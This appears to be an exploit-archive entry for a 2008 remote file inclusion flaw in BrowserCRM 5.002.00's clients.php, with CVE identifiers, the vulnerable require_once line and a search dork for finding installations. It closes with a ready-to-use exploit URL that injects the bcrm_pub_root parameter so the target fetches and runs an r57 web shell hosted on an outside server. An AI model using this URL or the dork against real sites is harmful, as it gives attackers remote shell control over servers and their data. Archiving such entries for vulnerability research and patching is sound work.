BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion
Author: ahmadbady
type: webapps
platform: php
port:
date_added: 2008-06-07
date_updated: 2016-12-05
verified: 1
codes: OSVDB-46038;CVE-2008-2690;OSVDB-46037;CVE-2008-2689;OSVDB-46036;OSVDB-46035;OSVDB-46034;OSVDB-46033
tags:
aliases:
screenshot_url:
application_url:
script: browsercrm-5.002.00 remote file including
Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz
dork: Copyright © 2007 BrowserCRM Ltd
Vuln Code :
require_once($bcrm_pub_root . "/public_prepend.inc.php")
exploit:
www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?
Author: ahmadbady | kivi_hacker666@yahoo.com
# milw0rm.com [2008-06-08]